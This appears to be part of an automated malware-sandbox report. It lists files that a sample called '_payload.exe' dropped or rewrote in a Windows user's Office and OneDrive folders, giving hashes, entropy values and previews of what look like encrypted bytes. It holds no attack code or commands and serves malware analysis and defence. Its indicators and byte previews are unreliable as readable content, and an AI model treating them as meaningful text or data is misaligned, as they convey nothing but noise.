                                                                                                                          Preview:.<?[.'{N..h.H........n6.S./.2t..O.T.9.w.Dj0..EO8]...#.;.u.0.aM.....I...W.r....2C.i...E.....`....tbQ...6.......uH`:-[\R..p.x..1...Y..`.#:...D8.T1o2.d..jA.G.J.q&..k....-G.|..f.......1.|0..g:....1..5..U............3..IH39..k...r.M.u8.Om.u{.|...'.4d{...).f..b...$G.....y.[..W$.XI.1..S..&.j..F.SHe.I.<.'H.ym....{.E.7..).t..>.....tv....n|.?..S.g.4.-.......P...Dn....r"7...A.d..P.........D.....k.[6~mLz,uA,Q..h...+.e....A.=..SD7..1j.Mi.Y...D....q.<....!......!.[{..g...D^o...:A........NrcNp.F..E.G.dw.4B...&..'.v(......+pv....-.~c....9rm..cf.._/.........n..c....7...?X...0o<.MV.....=.ss.B&.e.g......l.....e[.U[....bO*......<<..x}{.7.hR...zg.M)........:../!...q...#.P.{.;<LdO..\`...\....,.w0..b..*.5p8.....;-.Y.....X_...p.....M...V(......N.?..n...c..(......9x....H.Z....o.yny<.i()V,6......d....[/..L..............a.Q...(H.... <.u?..~0}ia....f..zJF."{..0....'..eKL.....(_u.)....}..M45....=..e.y..S@....*.%<.......t.P.........=.]."...3.|..n....9V

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704101v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1733
                                                                                                                          Entropy (8bit):7.868733328249289
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:5kfu42Dwm/lHlU5RuYJjxCI0guuiAdA9xp6OAOZUrXe1mAkD:SV874zJjxCeiAgp6bOZ+hD
                                                                                                                          MD5:FE613B8E10A4F5E9BF6CFD449DDBEC52
                                                                                                                          SHA1:04FE671912089AFFC7E8337F5AC8A1EDCBAFB968
                                                                                                                          SHA-256:E2C76776F70CA605D8A84EF849CBD6BC36186CD0B5456066E8851400D2955C80
                                                                                                                          SHA-512:5806FBB3A3B2D61AC7AE6DB022F28D557F7F46C7819FCA32A39D4B13D638C0BA189641A4312F20E2E3CE40A4E24EB798194BA114F1E92E978B64F21BAE5E54EC
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.....o..A...v._........~Z.x..k|....9..,{.Z..l.......o.9D...O.M~.7...5)<.omG....8{.%.|...._..,..U.R... ..v1H....<iZY.-:.....H`.Y.Jf....-...>b&Y.ut(..8..K.:......u.z..;.!..OW..\..cz.ep..(6~ZO:....5.9p6..6|.sjz...G..$..|a....Tx...4.i...rj+7.(y0.r.........=..C.7S.m...b....s)FX...7........l2.E....VE._n.....]y..Mj...v....{...........M..@..1:.b......r...@/C.~.)l.3..R.t3u.HB.6.sQ....../..H^=.^3.R.*:.....{..P.E.M![.{...N...9.1.w&..|(..r..q.I.|s.!.3........-6.?5W<.s.J.Uy!.[.......`..}.`.x.Y....D.<......0.{.E.....M.&.$..;...^.O..Y..O...U.7....`8.J.....z.W...e....a P.].?.....6...PA.J...T...s...&.6.rI....$.AP;..p.F......8E&.4.D.....9.2_.B4.@..E,..>.<.p.]...Y..UH`.....:..+/2..Z.....HO.i. ..!.XH..S.h..{.M..A/6,....>.............+/zz3$....y..{.R.Q@lie...7+..w.7...m2.q.I.k...-.q.%...Gl ...2M...{z.&.|........|4.oE.[...%..oB.v....Y}.l=.K...R.q]/..rU...... G...I-ms.B.c.....c..g.$._..0.9(.N.....b.H3[.*...*T..r....+..)....3.p-..S.....o36y...$.~I{n..`

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704150v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1696
                                                                                                                          Entropy (8bit):7.867093757943306
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:7CQDJi58zVRee6nm/nvG0ihVrnXb5j7lOrn6MGD:7CQDcD/nmvvz+V7Xbum/
                                                                                                                          MD5:E6943BD19E3B7D435996BAFF7F9ED53A
                                                                                                                          SHA1:AAF32B3669BFF4D64107049EC1A4DC7FAD120074
                                                                                                                          SHA-256:89490DD5095B10C1F4BA24C44309D437DBD0B36E6C427A7A779709158473250A
                                                                                                                          SHA-512:AAAC95253571BE3D3F87F1988758A54439E2FCC01C288D7899F9AC6FF84E0CAF7CACBDDB9280E3B2040CBBE5FA8763F9E043E5669F99B5E655C5D9E201FFC309
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?...}.*..l.H[O....G.?n..Ok...@./....z.f{`.8..>e..b.`.A.^....s.}....!N..G{.1+.U.........CQ..cL._...I#Z..m....m.Fo.H.._.a..).'F.i?..1H-.c.....*.h.I|F.{@t.&.y@.8.8..{....r.<y.v..V....n,..]./...[.I..o=.3=\I..I.p.Pm\....=...9....!..[F.........Y_=)..P...[...4.i..\........Z.J#.j...U..8#.8...P.....>.$.t.?z.&1=_.?..r...L.r.`...sE.g.....$.,...R.{..Q[....rT.jKx...B..9..O..V.|~5..n..Td..8.i..Uq...].y..,..frV......O..5c:m..z.."E.7^.....%?8N.i......c&....2...kN.q...n!...W...).`.V......w.$..t...+0n.h\J!...0.......Q...G?p.H....7..CE!....nG........".Q.Sj.......\,W..f.~.IE@ .,......r..:...[.....C"...`.=e.zA1b3k...5..Q...........r)L".f.......Wd..Ul.@.......K....r.I..."....FY..R....|..A(..<.m.z....!#...r....y/.t*lV|.hh.....^..2...m.~>...]..nG....m.....Y.62:.4}...DIG.-../.....n..Z.5..}`......... ....Z>L..Z.....3. .v...7.>+)J8...8m....H.3.1:.......U.Co..v.G....)........1FNOm0z^@...M......Z.;......VH|..0.j.<.=..Uo.x.R.^..,...1.b.....{.x....L.Z.#:..(.fyQ[..m..M..L..a....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704151v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1733
                                                                                                                          Entropy (8bit):7.888516118890617
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:exjicrTMlhN69L8ehbz3gnqFIsquQv4grofgQD:K669LRhbzQnqGrv4pgM
                                                                                                                          MD5:8FAEE24D34D157F3AA40AD34922AB613
                                                                                                                          SHA1:662D8955979594255B621A65B00474E288460E6F
                                                                                                                          SHA-256:E571302CFE12042622CDFBD527F10B1569C3BBAAF9ACD80C8C7144F1AB320E9B
                                                                                                                          SHA-512:D63BAAB2270A1BB383004201076F4AB5ACC42F66D1B990B571C76859F9FCC2ACA7FC1934827BC01E41426072596CEFC2AC3AA59BB9549D942D1F064EA8B4D8F9
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?>&..9.xy...CL.....l..?...R..D....q.6K.0S...$[k.(.R..l..!.b.Y3..ca.*....... ...S..m..m..-...@....;.'.$..c;.4....2..o..}.%.n......p[>.a...._b.....?|ar......y..4%R..[p.$..2..q....5...9...Y..b...5...D..+K...j@..4..........'.V..R..t...1.>U.]....rm.X......-."z6W.c&.%.w.4...w3.Ji..8.ud..&.A...#........$...(..r....{.%.Vp...|yL......q-..z..Q1..u.?.~._......S.....dm.w....?.9..I.gW}.#J....]+.$_.b0H........J...6t .......!../...P.....j.....8w&.y.8.m.a*........fT..n-....E.2k...:.5)..ZRWe.U..OBF....2....:-.......p..k...wU.-4..r4..6...\rs..-.......k..Z...}l..|....W`,.e(..N.6.Z.|H......E."...x._.Y^..J.&uqV/.*...N...{$..T/$..,....&C....@..b...Z.<D=.L..7..lm.g..n.o..x.#.|..8.do..".........DGq.{..0. 7=. V.e....CT3.H.X..9...1.kc....Zq.....\...D..e...7.6..7v..,.u(.2.....k.'......X....>.-..r.^.b../...aS...#)s..D.k..n.?.L..-.D_....ZE0.]....6.o...{...\x....E.|.9..tGI2..M.),...<.b .^.|.>....KW...%..y;%..oWX.1.d...W7K...'..........k.2.y.f].iF.ih.X.I....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704200v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1714
                                                                                                                          Entropy (8bit):7.879385361119252
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:GO79TTzlb4OoRMHYkUIt21ibToQdJFdAXQnVDyM/D:G29TTzh48HYXFOL0mr
                                                                                                                          MD5:3F3C00FCC574457465C322D7FF5B87C2
                                                                                                                          SHA1:8B7BA3694A740B648ECDEB57B2A5B47D83F39593
                                                                                                                          SHA-256:4EC89295F182E92CB82672B0C9F646A5D3A0148583CBF9EFEAD39E0FFFC04FB4
                                                                                                                          SHA-512:CEA3E1DBA82DDE984401924F3F8CAA1168DDD1BE7A7425CC4BB72C9B2FC682C3963D84947BF8CE0C238512F08EC76D84B9F837088060F962BE0BF73852EFE5FA
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?m....TQ8.S...>~.......b.W)..b*....q....d..%..s.Emd...0.Z..+..o.....[w.(.k&.4g:..XI....-.^..F>O..}LA.....pt7..X.......H...i..rk...4...{...B...H.ZC......M......9...',.Y.......s.S.n.h.B.Y./}...2j..z...k.$G..:^OCw..I.....O.F...x=A<.}>..K2.;>.i...Z.B...J!...d..c..{..+3@.........m...~.C#{G/x...4......Tj@b.p......I...@u.y......D.[....h{..Dxf.#.q7..a.n.mPX...&....G....Fe...\..}SM.b.....*Q...\..".=.I'..Q.1.kp.....M.>...Q`}........Ma..B........^.....D.p....j._N.%F.eg......es..fT...#w'.Z.t..D....l%.....s ...q..F..Q...........h.1..n.:..$U....z(....o.....INPl6....v...P.h^....y......j.tH.K~.._......^....?70....@D..s.....>.@s9.S...m.Q.Lpe)..e..._..\.....&.#S...9.......q........<.1.!.).y(.'...EE~....a.P...?L.GG....w~pN......ZGO...nz..j........q-.a.iS.....{-....0..jA...4.....\IXv.6.X.....<.<..}.yI..#.T.!..z!.\J../.Z+..-..x."&<.Xo.r...<&.y/...d$!.Rl...9s..>.u.....9V......&..no..`....m....3q...o..SV...8.KB7..hPUnb.....4GE....&....w..8.:...<..H."'.y

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704201v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1751
                                                                                                                          Entropy (8bit):7.891902190856637
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:i8BEt/4P6aVbZdDDW+MnhmYDgPWGfIyjepRD:tBE/4PzV3DW+MnYppAyi
                                                                                                                          MD5:79F12410E0A9AA520021817135B45427
                                                                                                                          SHA1:6C75D947024E0923F90EBD1CE33BECF11E8DD411
                                                                                                                          SHA-256:357AD8DB118C7767FF292FF0550E45E134EB37F80567E2297B1E860AD70BE648
                                                                                                                          SHA-512:43943AC33F4C88287E342BE5C4C1A4731E3B1EF8063B027E299F214B2899874EAD6D4DB48E617D62EA95EC4FF9B1D43B82F58D8B37D289DAFAC4B14D513AC637
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.`..0$.o.t...*@GrR.{g./;.Z.....^R"...]....69.......~.....7..nQ.p....9..2... N.!.....H4..(T......X..-.E.....].....R..X.5.....B........Rkt...Sd.U...}...'RzYc.*...9._*....>7.@#.l[...P.N....XA..o{f5' ..w.<..C[[.6@........3{..2.}..g2#..\Ac.....3.:..>.z...p\..T....c..njq.......'h._Yn3..&............W.+..,E....x....NEH.'......cQen..UnO.I.K...I.NU..*.u...c..A.q.......#.,.d...m.[0X....X .......=c..xg.....y..+?.7.....2...%...dbu..{.$.].fP........YwpU~..@..kE..~.u...{#....~.6.Y.P..}..2..v.5.../...T...."t.u.D..../OE ..n........(T..S!P`.,...dFK*>.|mo..>..2G.z&.yE..r....p.p)B,.s,..5.%.@.~..i..Sw.'........`b..N...m..BI.t.p...F.....*^....=.....K?Q2..%%...2"....l.J..8.i...Ty5.*...i.R.pF}k[.Y>@.Z.}.w.....%k..W...fsmGZRA~e..J.@..X...o.......|...(.Q......[.o.-......6.....5..n..4[FY....V...1....[<p....8..l.....i6S.....$:...(.e...q:..r.T+......E.u..;LYP..n1.6...=......r.$........\.`.cH.....'$d......&...~].\x|...._aEC..G-L..F:.....-..B..\e....W..fx..EG..:...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule90401v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1583
                                                                                                                          Entropy (8bit):7.900109835554842
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:FosBUVlQT/CLKD4ip5imfXttUcm34YmjD:6sUVlQT/CAR5LX/Ucm34N
                                                                                                                          MD5:4F96CD1E720610BB9134910035A82448
                                                                                                                          SHA1:4F1E6F5321537B76A7FA6086320EB4D6E533D6D9
                                                                                                                          SHA-256:DC170DC8E94ADD6A5987132AEB9C90C2692F8CD74D5A81F728265865BDDDD006
                                                                                                                          SHA-512:CEE967B3789F3F4CE494E568543CF721F4775767498B331DC6D630524D28EE117F168B2A1EA3C6AA51EF63B80BB6A2D7F6A4BAC008377E3BED44A7F668F448EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmly....qsB...S.=.....aR!j..Q`.N............kP\...?5Es.....j.'.Al.n..o>3C@.....(W"}...N$...;..hIe$.5#.^..E.S.xyP?..z.R.#eO..7.r3.z....$..~.h....(..Z*Fg..V.....V.r.8*f...E.......S...j.....u..nx}...v..iW...uj6.1............6...:...6{.S.....f...UJ........G..`...V..e.|W}...h.z.u.L..$....}).......NvWN...nd.+.,&.U..{....g..H%...R.wB.B.%... ......oE...O...t$R.....Q.I0.T......K...P.d....b.3...C....Z......^...|M 9x5..[....b.".p...E.i....B.kY..n........_ ..F.........r..fN=J..u$.R!-.'`.H@1JW...a..S%........_FQ._.....vB4.H...u%++a.....e..1.0..+..lE..n...y. .:......f&/[fb..z).R.H..gu....\.l9.....z......a.G.....`..i....{a..F...;]..}s '....]1....d..6\.2...LP... 5.,.JO%...<.Dzi....Z"..;.....KO..{I.-H.~.eE&F......F4.XI.l.'+rV].......W.....!6_...."..}.7.'_.I.......4....a..0?....'~....!D.X..`.=w.../........j.....Q..07.....3iT.@.w&..c....u...|.c..$.p.FQ....0?0F<....\..K.=@.SN..%...j.C......".p...Z2SG...Vm0.m~....G.1,7rvDvK.j....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\setup32.exe_Rules.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):135031
                                                                                                                          Entropy (8bit):7.998690479427407
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:QSKkVw8Kjg675ta8vf06JRLw+bkkslDXX4QZMAPXPt:Qswjjg6Tv8GLwyslDXIaPft
                                                                                                                          MD5:F7AD3348A61255EF8421F7792098401E
                                                                                                                          SHA1:2A41252D39E133D10032931858E9B767E33BC12A
                                                                                                                          SHA-256:5FECDCED1D6977003D45086E84CD85EC7AE6C98E935FC44CB5E9849E0F76D157
                                                                                                                          SHA-512:74FB10904E338490C4439C1F66AB3B608EF5F650F64CD102869BF073C6485A18843C02D2B28112CFA6955EC3699D95027F2046264F178D50828CB22878D73C8C
                                                                                                                          Malicious:true
                                                                                                                          Preview:<?xml3..(,...............:DB.a.....&G7...>....2:...s..9......l.g..,}C-.g;...tO...~+...<>..9H..MROJ.B.7.Z.W.....:~....^...E((.....8m..A.*.H....8.........x..8_...M..z.>].Rz...M`n...Tt.x".|:..#...7..Qq..I=. .Ol:...vV.o.....&..&............_.$..{.m.;%..w.0C...."Wfs....H..'..`.|.H^\x5~..i^N.....<1.9"J.Bj...K@]....qw.X$$r.y|.....4......c..|.......8O.....O}0y. .f...W..~......N{1s.OT...R%9....KH...q.........Zi.%B'..O......q0..<e....W...,..n..XcZV.ws.....M.c...n......9K.f.L9..;.C..\J...T...@...+...*:..+..z.....<y..1...R....*.Kk.T......L.........8.p93.W.B..1f...%./Y.......X,.p..,0oA.!.. L2.vnaxQ.b..T|TU;..f].F.-.$t......X.WW]..-R.n&..N...G.s....^..l.X}.{.LqP-..a,...un........%.p.t.$.Z...1....yxy.E..d..........|.>"@..Y....h@.Q3....Q.F....LD.vi..F...j.T.*.....*....|\5..#..'L.(..4j.k.4.>.9.V.0x...v....j..r..'o.O./...I[Le..l.....mf..A.<0^y..9|...E.t.....w....?.ag....9...;...R..|...#....:..u._..>..+"^,.+.%k|\\~.X.6..B.O..kV3.w....)+t/.vl.-...w.ya.%..S...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\Features\1-3FeatureCache.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1152
                                                                                                                          Entropy (8bit):7.7862831083514585
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:u0gYb0gTnH17CJp0W6qZvyYm/bJZe0UsVDUR+/21RU518YGpxbD:uR60gTnH17a+W6qcYubJA0UsVDIG2fPX
                                                                                                                          MD5:F95B23D388468E00257B1419A00428FD
                                                                                                                          SHA1:76B368CC73A98D1B409C91168A1E8BEB6B327C28
                                                                                                                          SHA-256:146016A9BE29847CE3DA94904CB1C1837161AFDE397E804DA7DACD184C9A4EF7
                                                                                                                          SHA-512:2073A84384DBB1F2FE5FE11FC41BBBA3DC84860D66EBDAF6EF1396554A940AA64CC66F0E7E78E217A317A7D5A845F615BFF1AE1B0BFC39EBB588CBED9A9B70D4
                                                                                                                          Malicious:false
                                                                                                                          Preview:1.1.9..,.5..p....o... ......c..E-.....Eq..S^..Do.N.`...`DB.0...7q.[.<V...>..Z.1.%....4z.0..F=.!...........v..heo..iUh..l...X2.}......j ...).wx..:m..|..[.p.).&l.JG..\.q.^K...;.....h;N...G.0...kp2.M.c.E+y..O4...\=.....wGn....XL.#...`3..y......Y.r1E....S..{../.V....^.5g.7.Ih....TK.SH;...../:.r=3...,.#Uk.........G.jG|.S..;.h....(....g...Ang....C.X.2..$.../s{.O7.9~....g...D6....F..#...Av..E.!..4.7.p.P.0..m|.=<...J{N....j....T.J.*..s^G.~.P.z#..`..f.,.g.-R.6...6+k..4.*V..J...M.O.4c..~...P...+^I..:.{...*t..M...=.B..7..{,7.^.#..H.a....:.'...O/...y....v..".P...N.H&O...d......I.D....e.F$.U..j........po...j..E..Cl.@..?){D%..3....0.Z.u.k.....]s..r.|.,}.....*OgP.X,........i./P....C;N..o]x.J...$'...Vg.h.:s\_X.t......v.MN......C.M^2.@g.<...56..n.......1XJ...s..a..)\Q.X...RR.v..o.T\..V.f*\K..4.N........T.X.../...0.mk$+:......Y.;...1>..i......P.OGP....l.d.."X..(..V......w.IG5.....s...g..A.fu.......y.....n.C...e.J...kOi.h.V,.%.a..V.....^\...5......~ld...e

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\Features\1-7FeatureCache.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1170
                                                                                                                          Entropy (8bit):7.829622148823197
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:whUZbcK898aAdYeFeOu3eYGxYM49mu489OPFaPw2Tl93raFbD:WA33UOFxZYmx89OPgPtp93raVD
                                                                                                                          MD5:8F7CB7149DDB89CC01E3BD962BF19195
                                                                                                                          SHA1:08565BC9487C01523D98BE1E493ABF0611EA5FCF
                                                                                                                          SHA-256:BF2AA3BB99A502398DE42B8153527476D325070152F13E6E85A46C174AC7F411
                                                                                                                          SHA-512:4EF7EC4F638F5F28319833B87849EF88E4AFF766FF3243FDB6C95FE8CAC8654DFC67505926A83105D0D3FE79849DA1871035D580D5B8BC0B16ECA663FC8B5642
                                                                                                                          Malicious:false
                                                                                                                          Preview:1.1.9..G2.f....I..<JwiN..]5..H8/?:...S..5.4....I.^...y{.d[.-l.RD.5T...P.U........e...n.h....l'.w...{.....Z.D!Wt.M.......?..q.c.$.....AX..;.?@j.-`....U~.u.(iM.0`P.AM.l`f*".#...(.[]y....zh,..SZ..X5P...(....'.p..~.....b...XB.`l......1p.....j..7^.6d...` .o......"[..Y3....yvpA|......{/...]...#Wp.O+.u.:....R..>C.`.j..{?FyY..SH..T...k...b.C".NL....."...\...E(-.EnNO...Mu.].s<..(`5!{..q7....'Y..w....]m........o..h..#T>.-..\....9.Y.E#...&".4...6.J.........z...i....I..4.u.....E..J2....\......B...|..n7.n.r..l........e.$Lm.J.....*M.....Y#.q.....$Z..n.J....b.(..P<U..hE`.JE>......V........pIv..E.>&...MB.`jd..>.. ....2.xr...Aa.;.+m.\.-...j....sH.(..d..D..H....c...>..t..t.J"...]y.....z...e.R...E.*.n...>.g;y. ...W.....*....v.h..X..A.. b~....A...E....Fq..Q.....2...l.. ...h.@..%CY.~N..<.@.....=..L...i......s...._~*.Y;..S.Q>...;s...|.W.1..gi...:....U...V.....T.x )..t&.QL..E...q./'.......Y..#.^..),..xo..3?,.@.L...7..%y..{.....M..Sj...z...6T.c.,$

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2023-10-04.0953.5356.1.odl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):0.7024952193183785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:HU0x8MdIqi2jMQ7zbf/TSSR+0MQT9DCoMQlNiS0KM3FyB86G879z9Xu2z:HU0x8cI32jMQHb3TfR+0TZCcAFBQpZ
                                                                                                                          MD5:E2D28B326E2EB9FA52532C7EED3F7E01
                                                                                                                          SHA1:1ED78AF9BAD520490696E6576957C80A3044A059
                                                                                                                          SHA-256:05C2DF5D6CF9BA586B755838702FA890FAFF335165A43C13BC6B6EA4BCEFB24F
                                                                                                                          SHA-512:3B838F0C227A6345A1666A4FB9645B5C6AA2ED5F2CBE06E0974AA79DEC3BDD3C518328ED300119CE44ACF6D0A0692EAC83BCEF645FCD00E947CA39B9AD20C46D
                                                                                                                          Malicious:false
                                                                                                                          Preview:EBFGO..D..........u.~.......;.?..X.A9.)^6r....</LJ1,...../...P...l...x`.S+..ncM..8S6..(n.. Bvv.$...M....^.B....9.1...........|.$.:..cgD.vl..].{u&<.X6.v.h:.u....2.7.._...[..a..........~r./....O...f.....c6m_%.......v.J...u..w....1>...'H.H1i...l.P..3JF.Awr...b......y..:I..!.............-.6.s_..C~u./...L"v..Y(...-.M....`x.=....!..jG.9&.2..e...` .!..Y..1.^.O4. .Z^..v..3F.N'.<^<..A.M..}.......-..2.< ...c....6.!.,^^.wj....y{^...f.fxr.uA....E.sP..iF.....GZ./.h.>5...._.k...cbl..P-.......X..a..6....G.+...I....P..F.N..Q.#.a..4'P..j..Ewl.F./s,cq.U.o+..n.:E.Q...+y......._n......\........i...9.hnw..7.K.O.13.l..._..d|f....q...4.Kp...i...kF...a2..]Ul....+MO.~..Qt2.Y.e....Fbp.T5<.,.(.'b5.L....Zc.~#.....ZI.(..O...`..R...d....S......z...........@E...^....A....l..#.FC.._.`^{.N.*..6......).A.M.VJ.|3.........:.Y\;D+.F.Q....];M`.)U.;fO.'.}...^C......[..p.Zd..;....?|.C!... ..$..'vb..':..cz..E.+..W..8....c...z.{.R%y.ib{[...H..mO..'.V.HQ{..%_..W.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2023-10-04.1052.6292.1.odl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):0.7697736343501882
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:aQhue9uG27AzvZtteqg1IYXQyCWpF4l7Mv:aQp9O7aZWIYXQ9W34l7
                                                                                                                          MD5:22515AB471FFE5BAFCD2EEB216D90CCA
                                                                                                                          SHA1:D844DDBBCECA9CF905DF107B35AD730834B06078
                                                                                                                          SHA-256:3EC3F0D0119F49776D687AABE530387A9669097C46502A44BBA82A33CD9AA708
                                                                                                                          SHA-512:2C01E9B0E00275615A0122A874BD8B17ED3488F0DCA4E4F8D52206A11A9865168CDF01566F6A04BADEF6B4C4EDB0D0E56353DFCD5F5D35CB9C2E0C22A859FA72
                                                                                                                          Malicious:false
                                                                                                                          Preview:EBFGO..O;8.9.....H^2wTGr&lP.dM&!.`.....1..P,G.1.....>$O.Q.K.m..3......S.F..)+7PA....[/...@Ag.A.Z../.......v@.ry>...&.V#... >TRI..........^..J.Y....|.n.1[.".I/.M@$..).&.'...8-3..6..~.R..F.~Q......w|Ev...........u.......UbV.{.(q..o.4.a..G.EH.........M8..&...T...f.s.0..d..n..1........?dO%....U...b*".a..Rrq.&iF..v:....y....0%.".=.i.....;]....*.QE.J......_....!.B?....c...n.2..0..\U.o....T...1D..^U.K.F*.M..%^e.....=....e...^NO... >..^~$X.(X..D.?B.w...{.&H.". +.Q......-../d.%b^c/.....l.w...eJ.>|...V.CT.i..$'...P.^..t......7..1..$.fa<.g..7.3.S9.............B....S.H.9..r.(.~...o&.X0y(...tD...q....S.D.u..y*.4....7|..j...59..#.......t.p....|..vv{....5.I.{H..6.D.O*b0.......).$....{5......O....[n5......[..e.J...t.....F9}...yv.......]...~...qZ......(]..VNW-.:Z.........9JS.-.....B..t\.P.,\........ .^f.!.g......,...]!*.7&#u...1^$H.....wo..m..n.....u|.f7..Ek....&&.Gb.p.I..(,.*L.E.5.n...T...x....Q...|.B.U....hK.Y...;..S6...3....a...E..S{...P.R......F.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\telemetry-dll-ramp-value.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):344
                                                                                                                          Entropy (8bit):7.251432153429402
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:i7Eoy5d8B8aPJdndSm2DIoZTVEMAPMqUIpM/GEfTbhYKKfJq5PDTcii96Z:mEVA+aR6m3qTVEjbQbhnKhq5bTcii9a
                                                                                                                          MD5:3122EBCBB6B79811F90786DD7CC5ECA1
                                                                                                                          SHA1:2788893E53D0727728FC3614C894A3DC8EB586DC
                                                                                                                          SHA-256:8A0289D5644FDFAAF1377D1DD02AC337C7843210965060354F50D881F34D73A6
                                                                                                                          SHA-512:72C92089632A34638EAF80039193ADAB65D799EA613966D213E9AE1D89A0F4FC5A3AFC72DE372AF7545658BAA506BFD32B0479424786627C7B0631AF9908EC2B
                                                                                                                          Malicious:false
                                                                                                                          Preview:2..0,r...`ug.Q5.e2'..8..Q7...V..R.R7Pjph._..p?....:'-5.H...h.G.Z....s>$..7u.......u...C...\.0.RY..|'.kM.......S..g..WK.h..l..I.4..'.y....`.l.2....._.*...EJ.5....].s6&...A.Ut.Y...t.U)J".......#T..PI.......i.....2..A.c...7{..."jC\........./..w..^Z.M.j.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-2023-10-03.1149.2948.1.odl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):1.0410095761111495
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:NyI+TirsCzWqDOaFha0mqwT65hPA6mNfhegpVbe8a9uz:NyTTirsCCor0qwco6mLDa
